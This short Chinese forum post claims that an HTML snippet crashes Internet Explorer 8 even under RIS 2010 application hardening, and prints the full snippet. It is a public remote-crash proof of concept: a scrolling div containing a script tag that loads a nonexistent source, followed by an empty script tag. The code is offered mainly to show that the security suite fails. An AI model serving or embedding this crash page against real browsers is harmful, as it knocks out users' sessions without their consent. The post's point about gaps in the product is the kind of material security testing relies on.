一段公开代码,绕过RIS一切组件
当访问的网页包含如下代码的时候,即便IE加入到RIS2010程序加固也白搭IE 该报错依旧报错,RIS所有组件都无反应注意 这个测试,主要说明 程序加固对IE的加固,还是不坚固!!!另外别拿解释代码的内容来回帖,这是MS Internet Explorer 8.0.7100.0 Simple HTML Remote Crash PoC虽然写着IE8,估计其他版本的IE 也一样。
代码如下
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<body>
<div style = "width: 100%; max-height: 400px; overflow: scroll;">
<script type="text/javascript" src="nichtvorhanden"></script>
<script type="text/javascript"></script>
</div>
</body>
</html>